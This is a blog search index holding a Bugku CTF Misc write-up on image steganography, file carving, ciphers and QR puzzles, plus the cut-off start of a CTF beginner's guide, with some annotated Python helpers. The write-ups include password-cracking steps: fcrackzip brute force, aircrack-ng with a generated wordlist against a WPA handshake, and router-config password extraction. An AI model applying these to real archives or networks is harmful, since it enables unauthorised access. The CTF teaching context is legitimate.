search.xml
1205 lines (1089 loc) · 309 KB
<?xml version="1.0" encoding="utf-8"?>
<search>
<entry>
<title>Bugku CTF Misc</title>
<url>/2020/03/30/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/</url>
<content><![CDATA[<h2 id="签到"><a href="#签到" class="headerlink" title="签到"></a>Sign-in</h2><p>Scan the QR code, follow the Bugku WeChat official account, and send “flag” to the account to receive the flag.</p>
<h2 id="这是一张单纯的图片"><a href="#这是一张单纯的图片" class="headerlink" title="这是一张单纯的图片"></a>This is just a plain picture</h2><p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330224134844.png" alt="image-20200330224134844"></p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">&#107;&#101;&#121;&#123;&#121;&#111;&#117;&#32;&#97;&#114;&#101;&#32;&#114;&#105;&#103;&#104;&#116;&#125;</span><br></pre></td></tr></table></figure>
<p>Decoding site</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">http://tool.chinaz.com/tools/htmlencode.aspx</span><br></pre></td></tr></table></figure>
<p>After HtmlDecode:</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">key{you are right}</span><br></pre></td></tr></table></figure>
<h2 id="隐写"><a href="#隐写" class="headerlink" title="隐写"></a>Steganography</h2><blockquote>
<h3 id="png格式"><a href="#png格式" class="headerlink" title="png格式"></a>PNG format</h3><p>A PNG file is made up of six main parts: the <strong>file header</strong>, the <strong>IHDR chunk</strong>, the <strong>PLTE chunk</strong>, the <strong>tRNS chunk</strong>, the <strong>IDAT chunk</strong> and the <strong>file trailer</strong>.</p>
<p>The file header is normally 89 50 4E 47 0D 0A 1A 0A.</p>
<p>The IHDR chunk describes the basic properties of the image; its layout is a 4-byte Chunk_Length, a 4-byte Chunk_Type, 13 bytes of Chunk_Data and a 4-byte Chunk_CRC.</p>
<p><strong>Chunk Length</strong>: normally 13; it gives the size of Chunk_Data.</p>
<p><strong>Chunk_Type</strong>: 49 48 44 52, the ASCII string "IHDR".</p>
<p><strong>Chunk Data</strong>: 4-byte Width, 4-byte Height, 1-byte BitDepth, 1-byte ColorType, 1-byte Compression Method, 1-byte Filter Method, 1-byte Interlace Method.</p>
<p><strong>Chunk CRC</strong>: a CRC computed over Chunk_Type and Chunk_Data taken together.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330224016283.png" alt="image-20200330224016283"></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330225635486.png" alt="image-20200330225635486"></p>
<p>PNG signature: 89 50 4E 47 0D 0A 1A 0A</p>
<p>IHDR chunk length, 13: 00 00 00 0D</p>
<p>IHDR chunk type: 49 48 44 52</p>
<p>Image width: 00 00 01 F4 (500 pixels)</p>
<p>Image height: 00 00 01 A4 (420 pixels)</p>
<p>CRC: CB D6 DF 8A</p>
<h3 id="CRC循环冗余校验"><a href="#CRC循环冗余校验" class="headerlink" title="CRC循环冗余校验"></a>CRC (cyclic redundancy check)</h3><p><video src="/video/[CRC校验]手算与直观演示.mp4" controls="controls" style="max-width: 100%; display: block; margin-left: auto; margin-right: auto;"> your browser does not support the video tag </video></p>
</blockquote>
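<p>The IHDR layout and CRC rule above are enough to detect the tampering this challenge relies on. The Python below is an added example, not code from the original write-up: it builds a minimal PNG header in memory (a constructed sample with width 500 and height 500, the 0x1F4 value that the fix restores), overwrites the height field the way the challenge file was altered, verifies the stored CRC against one recomputed over Chunk_Type + Chunk_Data, and then searches for the height value that the stored CRC actually commits to. The function names and the offset table are mine.</p>

```python
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"  # 89 50 4E 47 0D 0A 1A 0A

# Byte offsets inside a PNG whose first chunk is IHDR:
# 0..8 signature, 8..12 chunk length, 12..16 chunk type "IHDR",
# 16..29 the 13 data bytes (width 16..20, height 20..24), 29..33 CRC.
IHDR_DATA_START, IHDR_DATA_END, IHDR_CRC_END = 16, 29, 33


def build_png_header(width, height, bit_depth=8, color_type=6):
    """Constructed sample: signature plus one correct IHDR chunk (no image data)."""
    ihdr_data = struct.pack(">IIBBBBB", width, height, bit_depth, color_type, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + ihdr_data)  # CRC covers type + data, not the length
    return (PNG_SIGNATURE + struct.pack(">I", len(ihdr_data)) + b"IHDR"
            + ihdr_data + struct.pack(">I", crc))


def tamper_height(png, new_height):
    """Overwrite the height field without touching the CRC, as the challenge did."""
    return png[:20] + struct.pack(">I", new_height) + png[24:]


def parse_ihdr(png):
    """Decode IHDR and report whether the stored CRC matches a recomputed one."""
    if png[:8] != PNG_SIGNATURE:
        raise ValueError("missing PNG signature")
    length, ctype = struct.unpack(">I4s", png[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    data = png[IHDR_DATA_START:IHDR_DATA_END]
    (stored_crc,) = struct.unpack(">I", png[IHDR_DATA_END:IHDR_CRC_END])
    width, height, bit_depth, color_type, _comp, _filt, _interlace = struct.unpack(">IIBBBBB", data)
    computed_crc = zlib.crc32(ctype + data)
    return {
        "width": width,
        "height": height,
        "bit_depth": bit_depth,
        "color_type": color_type,
        "stored_crc": stored_crc,
        "computed_crc": computed_crc,
        "crc_ok": stored_crc == computed_crc,
    }


def recover_height(png, max_height=10000):
    """Return the height whose IHDR CRC equals the stored one, or None if none matches."""
    info = parse_ihdr(png)
    if info["crc_ok"]:
        return info["height"]
    data = bytearray(png[IHDR_DATA_START:IHDR_DATA_END])
    for candidate in range(1, max_height + 1):
        data[4:8] = struct.pack(">I", candidate)
        if zlib.crc32(b"IHDR" + bytes(data)) == info["stored_crc"]:
            return candidate
    return None


if __name__ == "__main__":
    original = build_png_header(500, 500)
    shortened = tamper_height(original, 420)  # 0x1A4, the value seen in the challenge file
    print(parse_ihdr(shortened))              # crc_ok is False
    print("height committed by CRC:", recover_height(shortened))  # 500, i.e. 0x1F4
```

<p>For a real file, read the bytes with <code>open(path, "rb").read()</code>; only the first 33 bytes matter. The CRC warning TweakPNG reports in the 隐写3 challenge is exactly this mismatch, and <code>recover_height</code> replaces guessing "some fairly large number" with the single height that makes the CRC consistent again.</p>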
<p>Solution: the image height has been altered. In the IHDR chunk, change the height byte “A4” to “F4” and save; the hidden flag then appears.<br><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/F9kxb7Y.png" alt="img"></p>
<p>Modified successfully</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Eao2ZCH.png" alt="img"></p>
<p><code>BUGKU{a1e5aSA}</code></p>
<h2 id="telnet"><a href="#telnet" class="headerlink" title="telnet"></a>telnet</h2><p>Challenge file: <a href="http://120.24.86.145:8002/misc/telnet/1.zip">http://120.24.86.145:8002/misc/telnet/1.zip</a></p>
<p>Open it in Wireshark and follow the TCP stream.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/DtuESFV-1585581117817.png" alt="img"></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/r0xMz6X-1585581133752.png" alt="img"></p>
<p>This gives flag{d316759c281bf925d600be698a4973d5}</p>
<h2 id="眼见非实-ISCCCTF"><a href="#眼见非实-ISCCCTF" class="headerlink" title="眼见非实(ISCCCTF)"></a>Seeing is not believing (ISCCCTF)</h2><p>Challenge file: <a href="http://ctf.bugku.com/files/919ee4ea1658c3e3ef8b59b67f298470/zip">http://ctf.bugku.com/files/919ee4ea1658c3e3ef8b59b67f298470/zip</a></p>
<p>The download is a file named zip; following the hint in the name, add a .zip extension.</p>
<p>It opens fine, and inside we find<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/ftqSTAK.png" alt="img"></p>
<p>Extracting it reports a file error; on a hunch, rename that file's extension to .zip as well<br>and it really does open. The archive contains<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/yc7K9hi.png" alt="img"><br>Searching through the files, the flag is finally found in <em>眼见非实.zip\眼见非实\word\document.xml</em><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/yiz4PTU.png" alt="img"></p>
<p>flag{F1@g}</p>
<h3 id="技巧"><a href="#技巧" class="headerlink" title="技巧"></a>Tip</h3><p>With so many files, how do you find it? Use Everything's advanced search to search file contents.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330232303214.png" alt="image-20200330232303214"></p>
<h2 id="啊哒"><a href="#啊哒" class="headerlink" title="啊哒"></a>啊哒 (ada)</h2><blockquote>
<p><a href="https://blog.csdn.net/wxh0000mm/article/details/85683661">Detailed guide to using binwalk</a></p>
</blockquote>
<p>Running binwalk on the image shows a zip file embedded in it.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200330235921186.png" alt="image-20200330235921186"></p>
<p>Split it out with dd: <code>dd if=ada.jpg of=adazip skip=218773 bs=1</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331000426142.png" alt="image-20200331000426142"></p>
<blockquote>
<h3 id="linux中dd命令详解"><a href="#linux中dd命令详解" class="headerlink" title="linux中dd命令详解"></a>The dd command on Linux</h3><p>dd: copies a file using blocks of a specified size, applying the specified conversions while copying.</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">1. if=filename: input file, default standard input; i.e. the source file. < if=input file ></span><br><span class="line">2. of=filename: output file, default standard output; i.e. the destination file. < of=output file ></span><br><span class="line">3. skip=blocks: skip this many blocks from the start of the input before copying.</span><br><span class="line">4. bs=bytes: set both the read and the write block size to this many bytes.</span><br></pre></td></tr></table></figure>
</blockquote>
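<p>Signature scanning and offset carving, the two things binwalk and the dd line above do, as an added Python example (not the write-up's own code): scan a byte blob for a few well-known file signatures, then copy everything from a chosen offset onward, which is what <code>dd if=... of=... skip=N bs=1</code> does. The sample blob is constructed inline: a JPEG-looking prefix followed by a real zip archive holding a text file with made-up contents. <code>MAGICS</code>, <code>scan_signatures</code> and the other names are mine.</p>

```python
import io
import zipfile

# Signatures the scanner knows about (a tiny subset of binwalk's database).
MAGICS = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"PK\x03\x04": "zip local file header",
}


def scan_signatures(blob):
    """Return sorted (offset, description) pairs for every known signature found."""
    hits = []
    for magic, name in MAGICS.items():
        start = 0
        while True:
            idx = blob.find(magic, start)
            if idx < 0:
                break
            hits.append((idx, name))
            start = idx + 1
    return sorted(hits)


def carve_tail(blob, offset):
    """Equivalent of: dd if=blob of=out skip=<offset> bs=1"""
    return blob[offset:]


def build_sample():
    """Constructed sample: a JPEG-looking prefix, then a stored zip appended to it."""
    jpeg_prefix = b"\xff\xd8\xff\xe0" + b"\x00" * 200
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        zf.writestr("note.txt", "constructed sample text, not a real flag\n")
    return jpeg_prefix + buf.getvalue(), len(jpeg_prefix)


def extract_embedded_zip(blob):
    """Carve the first embedded zip and return {member name: bytes}, or None."""
    zip_hits = [off for off, name in scan_signatures(blob) if name.startswith("zip")]
    if not zip_hits:
        return None
    carved = carve_tail(blob, zip_hits[0])
    with zipfile.ZipFile(io.BytesIO(carved)) as zf:
        return {info.filename: zf.read(info.filename) for info in zf.infolist()}


if __name__ == "__main__":
    blob, zip_offset = build_sample()
    for off, name in scan_signatures(blob):
        print(f"{off:>8}  {name}")  # the zip is reported at offset 204
    print(extract_embedded_zip(blob))
```

<p>Carving from the zip's own start is enough because zip readers locate the central directory from the end of the data, so a trailing archive survives whatever precedes it; that is also why an appended archive is easy to miss when the container still opens as a normal image.</p>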
<p>The extracted archive needs a password, so the only place left to look for clues is the image itself.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331001042071.png" alt="image-20200331001042071"></p>
<p>The file properties contain an odd-looking hexadecimal value <code>73646E6973635F32303138</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331001235941.png" alt="image-20200331001235941"></p>
<p>Converting it to ASCII gives <code>sdnisc_2018</code>, which is the archive password</p>
<p><a href="http://www.ab126.com/goju/1711.html">Online ASCII converter</a></p>
<p>Extract the zip with that password to get the flag <code>flag{3XiF_iNf0rM@ti0n}</code></p>
<h2 id="又一张图片,还单纯吗"><a href="#又一张图片,还单纯吗" class="headerlink" title="又一张图片,还单纯吗"></a>Another picture, still plain?</h2><p>Save the image and drop it straight into binwalk: it contains two images, one JPG and one TIFF</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331004443767.png" alt="image-20200331004443767"></p>
<p>Separate them with foremost: <code>foremost 2.jpg</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331004859305.png" alt="image-20200331004859305"></p>
<p>This gives the flag <code>falg{NSCTF_e6532a34928a3d1dadd0b049d5a3cc57}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331005016003.png" alt="image-20200331005016003"></p>
<blockquote>
<h3 id="foremost使用简介"><a href="#foremost使用简介" class="headerlink" title="foremost使用简介"></a>Quick introduction to foremost</h3><p>Install: <a href="http://foremost.sourceforge.net/">Foremost website</a></p>
<figure class="highlight shell"><table><tr><td class="code"><pre><span class="line">LINUX:</span><br><span class="line"><span class="meta">$ </span><span class="language-bash">tar zxvf foremost-xx.tar.gz</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash"><span class="built_in">cd</span> foremost-xx</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">make</span></span><br><span class="line"><span class="meta">$ </span><span class="language-bash">make install</span></span><br></pre></td></tr></table></figure>
</blockquote>
<h2 id="猜"><a href="#猜" class="headerlink" title="猜"></a>Guess</h2><p>The hint says the flag is the full pinyin of someone's name</p>
<p>The image is another cropped photo.<br>A Baidu reverse image search finds the original<br><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/wnxCabR.png" alt="img"></p>
<p>Flag: <code>key{liuyifei}</code></p>
<h2 id="宽带信息泄露"><a href="#宽带信息泄露" class="headerlink" title="宽带信息泄露"></a>Broadband information leak</h2><p>The download is a binary file; an online search shows it has to be opened with RouterPassView. The hint says the flag is the broadband username, so search for user inside it and find username. <code>flag{053700357621}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/tGrk6jY.png" alt="img"></p>
<h2 id="隐写2"><a href="#隐写2" class="headerlink" title="隐写2"></a>Steganography 2</h2><p>Drop this silly-looking picture into binwalk</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331015629229.png" alt="image-20200331015629229"></p>
<p>Carve it with foremost: there is an archive containing an encrypted archive and a picture</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/E1VlWV1.png" alt="img"></p>
<p>Analysing the hint: three digits, a king, a goddess and a knight, plus a mention of Dou Dizhu... so that would be... never mind, just brute-force it</p>
<p>First build a dictionary 000~999 with a quick and dirty Python script (it works, though)</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line">filename = "num.txt"</span><br><span class="line"># open the file once and overwrite any previous run instead of appending</span><br><span class="line">with open(filename, "w") as file_obj:</span><br><span class="line">    for x in range(10):</span><br><span class="line">        for y in range(10):</span><br><span class="line">            for z in range(10):</span><br><span class="line">                file_obj.write(str(x) + str(y) + str(z) + '\n')</span><br></pre></td></tr></table></figure>
<p>Brute-force it. After trying many tools I finally found one that is fast and works well: [Advanced Archive Password Recovery](<a href="http://dl-t1.wmzhe.com/15/15056/Advanced">http://dl-t1.wmzhe.com/15/15056/Advanced</a> Archive Password Recovery 4.54.exe)</p>
<p>The password is 871</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/TBEoJSQ.png" alt="img"></p>
<blockquote>
<h3 id="Fcrackzip"><a href="#Fcrackzip" class="headerlink" title="Fcrackzip"></a>Fcrackzip</h3><p>On Kali, fcrackzip can be used to crack archive passwords</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">apt-get install fcrackzip</span><br><span class="line">fcrackzip -b -l 3 -c '1' -u flag.rar</span><br><span class="line"></span><br><span class="line">-b  brute force</span><br><span class="line">-l  password length</span><br><span class="line">-c  character set ('a' letters, '1' digits, '!' special characters)</span><br><span class="line">-u  archive name</span><br></pre></td></tr></table></figure>
</blockquote>
<p>Open the picture in WinHex; at the very end there is a base64-encoded flag</p>
<p><code>f1@g{eTB1IEFyZSBhIGhAY2tlciE=}</code></p>
<p>base64-decoding gives y0u Are a h@cker!</p>
<p>The final answer is <code>fl@g{y0u Are a h@cker!}</code></p>
<blockquote>
<p><a href="https://www.liaoxuefeng.com/wiki/897692888725344/949441536192576">base64</a> is a way of representing arbitrary binary data with 64 characters</p>
</blockquote>
<h2 id="多种方法解决"><a href="#多种方法解决" class="headerlink" title="多种方法解决"></a>Solvable in several ways</h2><p>We get a</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/jxex9qD.png" alt="img"></p>
<p>It won't open. Renaming it to .txt and opening it shows a hint about the image format plus a long base64 string</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331022803401.png" alt="image-20200331022803401"></p>
<p>So convert the base64 back into an image</p>
<p>which gives a QR code</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Xsi5dud.png" alt="img"></p>
<p>Scanning it gives <code>KEY{dca57f966e4e4e31fd5b15417da63269}</code></p>
<h2 id="闪的好快"><a href="#闪的好快" class="headerlink" title="闪的好快"></a>Flashing so fast</h2><p>This is a QR-code challenge. Save the image and bring out the trusty StegSolve, then Analysis->Frame Browser. There are 18 frames, i.e. 18 images.</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331023254916.png" alt="image-20200331023254916"></p>
<p>Scan them one after another.<br>The result is <code>SYC{F1aSh_so_f4sT}</code></p>
<h2 id="白哥的鸽子"><a href="#白哥的鸽子" class="headerlink" title="白哥的鸽子"></a>Brother Bai's pigeon</h2><p>Drop it into binwalk first: it spots a small something, but foremost does not separate any file out</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024321707.png" alt="image-20200331024321707"></p>
<p>Take it to WinHex and have a look</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024505111.png" alt="image-20200331024505111"></p>
<p>The end of the file has a patterned run of characters, with the letters of flag among them: <code>fg2ivyo}l{2s3_o@aw__rcl@</code></p>
<p>Presumably a rail fence cipher; decode it. Site: <a href="https://www.qqxiuzi.cn/bianma/zhalanmima.php">Rail fence cipher encoder/decoder</a></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331024804075.png" alt="image-20200331024804075"></p>
<p>Result: <code>flag{w22_is_v3ry_cool}</code></p>
<blockquote>
<h3 id="栅栏密码"><a href="#栅栏密码" class="headerlink" title="栅栏密码"></a>Rail fence cipher</h3><p>The rail fence cipher is a simple transposition cipher that shuffles character positions; the rule is simple and it is easy to break. Encryption: split the text into groups of a fixed number of characters, take the first character of each group and join them to get ciphertext part 1, then take the second character of each group to get part 2, and so on; finally concatenate part 1, part 2, ... into the full ciphertext. For example:</p>
<p>Plaintext: 栅栏密码加密规则示例<br>Characters per group: 5</p>
<p>Split the plaintext by group size:<br>栅栏密码加<br>密规则示例</p>
<p>Take the first character of each group: 栅密<br>then the second character of each group: 栏规<br>...</p>
<p>The result is “栅密栏规密则码示加例”.</p>
<p>Decryption reverses the process:<br>the ciphertext is split into groups of 2:<br>栅密<br>栏规<br>密则<br>码示<br>加例</p>
<p>Take the first character of each group: 栅栏密码加<br>then the second character of each group: 密规则示例</p>
<p>The result is “栅栏密码加密规则示例”.</p>
</blockquote>
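<p>The grouping rule above, implemented as an added Python example (my own code, not from the write-up): encrypt and decrypt for any group size, including a final group that is shorter than the others, plus a helper that tries every group size and keeps the plaintexts containing a marker. The test strings are the page's own: the 栅栏密码加密规则示例 example with groups of 5, and the challenge ciphertext <code>fg2ivyo}l{2s3_o@aw__rcl@</code>, which decrypts with a group size of 3 (the two trailing @ signs are padding).</p>

```python
def _group_transpose(seq, group_size):
    """Core of this rail fence variant: column i of every group, for i = 0..group_size-1."""
    if group_size < 1:
        raise ValueError("group size must be >= 1")
    groups = [seq[i:i + group_size] for i in range(0, len(seq), group_size)]
    out = []
    for col in range(group_size):
        for g in groups:
            if col < len(g):  # the last group may be shorter
                out.append(g[col])
    return out


def rail_fence_encrypt(plaintext, group_size):
    return "".join(_group_transpose(list(plaintext), group_size))


def rail_fence_decrypt(ciphertext, group_size):
    """Invert the transposition by tracking where each plaintext index lands."""
    order = _group_transpose(list(range(len(ciphertext))), group_size)
    plain = [""] * len(ciphertext)
    for cipher_pos, plain_pos in enumerate(order):
        plain[plain_pos] = ciphertext[cipher_pos]
    return "".join(plain)


def brute_force(ciphertext, marker="flag{"):
    """Try every group size; return {group_size: plaintext} for those containing the marker."""
    found = {}
    for g in range(2, len(ciphertext)):
        candidate = rail_fence_decrypt(ciphertext, g)
        if marker in candidate:
            found[g] = candidate
    return found


# The ciphertext found at the end of the challenge image (from the write-up above).
PAGE_CIPHER = "fg2ivyo}l{2s3_o@aw__rcl@"

if __name__ == "__main__":
    print(rail_fence_encrypt("栅栏密码加密规则示例", 5))  # 栅密栏规密则码示加例
    for g, text in brute_force(PAGE_CIPHER).items():
        print(g, text)  # 3 flag{w22_is_v3ry_cool}@@
```

<p>Because decryption is derived from the same index transposition as encryption, it stays correct when the length is not a multiple of the group size, which is the case where a hand-written inverse usually goes wrong.</p>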
<h2 id="linux"><a href="#linux" class="headerlink" title="linux"></a>linux</h2><p>No idea how this challenge was made: extract it, open the file in Notepad++, search for key and there it is: key{feb81d3834e2423c9903f4755464060b}</p>
<h2 id="隐写3"><a href="#隐写3" class="headerlink" title="隐写3"></a>Steganography 3</h2><p>The download is an archive; extracting it gives a PNG file</p>
<p>First analyse it with TweakPNG, which reports a CRC mismatch; as expected, the width or height has been tampered with</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331121703005.png" alt="image-20200331121703005"></p>
<p>Open it in WinHex and change the height to some fairly large value</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331121905992.png" alt="image-20200331121905992"></p>
<p>Open it in Windows Paint to get the flag <code>flag{He1l0_d4_ba1}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331122051534.png" alt="image-20200331122051534"></p>
<h2 id="做个游戏-08067CTF"><a href="#做个游戏-08067CTF" class="headerlink" title="做个游戏(08067CTF)"></a>Play a game (08067CTF)</h2><h2 id="想蹭网先解开密码"><a href="#想蹭网先解开密码" class="headerlink" title="想蹭网先解开密码"></a>Crack the password before you piggyback on the WiFi</h2><p>The file is a .cap. Opening it in Wireshark, almost all the packets are 802.11. The key part of WiFi authentication is the WPA four-way handshake, i.e. the EAPOL packets, so filter for those<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/uhxthkv.png" alt="img"></p>
<p>Crack it with aircrack-ng<br>First generate a dictionary</p>
<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">filename = "num.txt"</span><br><span class="line"># open the file once and overwrite any previous run instead of appending</span><br><span class="line">with open(filename, "w") as file_obj:</span><br><span class="line">    for x in range(10):</span><br><span class="line">        for y in range(10):</span><br><span class="line">            for z in range(10):</span><br><span class="line">                for n in range(10):</span><br><span class="line">                    file_obj.write('1391040' + str(x) + str(y) + str(z) + str(n) + '\n')</span><br></pre></td></tr></table></figure>
<p><code>aircrack-ng -w num.txt wifi.cap</code> starts the cracking</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/Qk5Eju4.png" alt="img"></p>
<blockquote>
<p>Aircrack-ng is a tool for cracking wireless 802.11 WEP and WPA-PSK encryption</p>
<p>WEP and WPA-PSK cracking options:</p>
<pre><code> -w <words> : path to wordlist(s) filename(s)
</code></pre>
</blockquote>
<p><code>flag{13910407686}</code></p>
<h2 id="Linux2"><a href="#Linux2" class="headerlink" title="Linux2"></a>Linux2</h2><p>Linux again. In Bugku's usual style, search for key in WinHex and... there it is...</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/image-20200331135657164.png" alt="image-20200331135657164"></p>
<p><code>KEY{24f3627a86fc740a7f36ee2c7a1c124a} </code></p>
<h2 id="账号被盗了"><a href="#账号被盗了" class="headerlink" title="账号被盗了"></a>Account stolen</h2><h2 id="细心的大象"><a href="#细心的大象" class="headerlink" title="细心的大象"></a>The careful elephant</h2><p>The archive holds a picture; dropping it into binwalk finds<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/IZS9cP8.png" alt="img"></p>
<p>After carving there is an archive with a second picture inside, but it needs a password.<br>Checking picture 1's properties, there is indeed a string in the comment field<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/ZsNBoQG.png" alt="img"><br>It is obviously base64; decoding it gives the password for picture 2</p>
<p>Open it in WinHex and change the marked A4 to F4<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/3O78QAI.png" alt="img"></p>
<p>Open it and the flag appears: <code>BUGKU{a1e5aSA}</code></p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/1OFwGmJ.png" alt="img"></p>
<p>Wait, I've done this one before??? Same flag...</p>
<h2 id="爆照-08067CTF"><a href="#爆照-08067CTF" class="headerlink" title="爆照(08067CTF)"></a>Photo leak (08067CTF)</h2><p>A picture of Sorami (穹妹); after a binwalk scan<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/36H9LAD.png" alt="img"></p>
<p>Carving gives an archive</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/nL6gEd7.png" alt="img"></p>
<p>Run binwalk on each of these files in turn; three of them are modified images</p>
<p><img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/20180607165234150.png" alt="img"></p>
<p>88 -> (scan) -> bilibili</p>
<p>888 -> (right-click, Properties) -> (c2lsaXNpbGk=) base64-decode -> silisili</p>
<p>8888 contains another zip archive; change the extension to zip and extract it to get a QR code -> scan -> panama</p>
<p>The flag format is flag{xxx_xxx_xxx} and the GIF hints at an order, so join them in that order separated by “_”:<br><code>flag{bilibili_silisili_panama}</code></p>
<h2 id="妹子的陌陌"><a href="#妹子的陌陌" class="headerlink" title="妹子的陌陌"></a>The girl's Momo</h2><p>The download is a photo. binwalk finds an archive in it; rename it to .zip and it contains a .txt that needs a password to extract. The picture carries the five characters <code>喜欢我吗.</code>, and that is the password</p>
<p>Extracting it gives<img src="/img/Bugku%20CTF%20%E6%9D%82%E9%A1%B9/fQDcyNX.png" alt="img"></p>
<p>Decoding the first Morse code gives HTTP//ENCODE.CHAHUO.COM/<br>Turn it into a URL<br><a href="http://encode.chahuo.com/">HTTP://ENCODE.CHAHUO.COM/</a></p>
<p>On that site, choose AES decryption for U2FsdGVkX18tl8Yi7FaGiv6jK1SBxKD30eYb52onYe0=</p>
<p>which gives momoj2j.png</p>
<p>Visit<br><a href="http://c.bugku.com/momoj2j.png">http://c.bugku.com/momoj2j.png</a></p>
<p>This gives a QR code; scanning it gives the flag. If it won't scan, invert the image and scan again</p>
<h2 id="参考资料"><a href="#参考资料" class="headerlink" title="参考资料"></a>References</h2><p><a href="https://www.abelche.com/2018/08/26/Writeup/WP-Bugku-%E6%9D%82%E9%A1%B9%E7%B3%BB%E5%88%97/">WP-Bugku Misc series</a></p>
<p><a href="https://blog.csdn.net/qq_39629343/article/details/80611614">bugku - Misc writeup (partial)</a></p>
]]></content>
<categories>
<category>CTF</category>
</categories>
<tags>
<tag>杂项</tag>
<tag>ctf</tag>
</tags>
</entry>
<entry>
<title>[Jingheng Cup] 2020 Geek Pioneer Cup beginner's guide</title>
<url>/2020/05/17/%E3%80%90%E6%99%AF%E8%A1%A1%E6%9D%AF%E3%80%912020%E6%9E%81%E5%AE%A2%E5%85%88%E9%94%8B%E6%9D%AF%E5%85%A5%E9%97%A8%E6%8C%87%E5%AF%BC/</url>
<content><![CDATA[<p><a href="#web">Web beginner's portal</a><br><a href="#crypto">Crypto (cryptography) beginner's portal</a><br><a href="#misc">Misc beginner's portal</a><br><a href="#catch_flag">Practice problems for newcomers</a></p>
<h2 id="1-web的详细入门指导"><a href="#1-web的详细入门指导" class="headerlink" title="1.web的详细入门指导"></a><a id="web">1. Detailed Web beginner's guide</a></h2><p>First, skim the most basic syntax of HTML/CSS, JavaScript and PHP (about 4 hours per language is plenty). The goal is that you are not intimidated when you see such code, can understand most of it, and can look up what you don't understand on Google or in the relevant documentation. Main references: <a href="http://www.w3school.com.cn/">http://www.w3school.com.cn/</a>, <a href="http://www.runoob.com/">http://www.runoob.com/</a>. You don't need to go deep here; a very shallow pass is enough, and you will pick things up faster later by learning as you go.</p>
<p>Now that you have a first taste of these languages, you need to start learning and consolidating through practice.</p>
<p>If you can do all of the above, congratulations, you are in. You will inevitably hit language-level setbacks early on, but that's fine: search Baidu and Google, ask in the group, and we will answer promptly.</p>
<ul>
<li><p>Next, learn the basics of the HTTP protocol</p>
<ul>
<li>Understand HTTP requests: GET, POST, HEAD; be able to read an HTTP packet and know the differences between GET, POST and HEAD</li>
<li>Be able to read HTTP response codes: 404 403 200 500 302 301 ...</li>
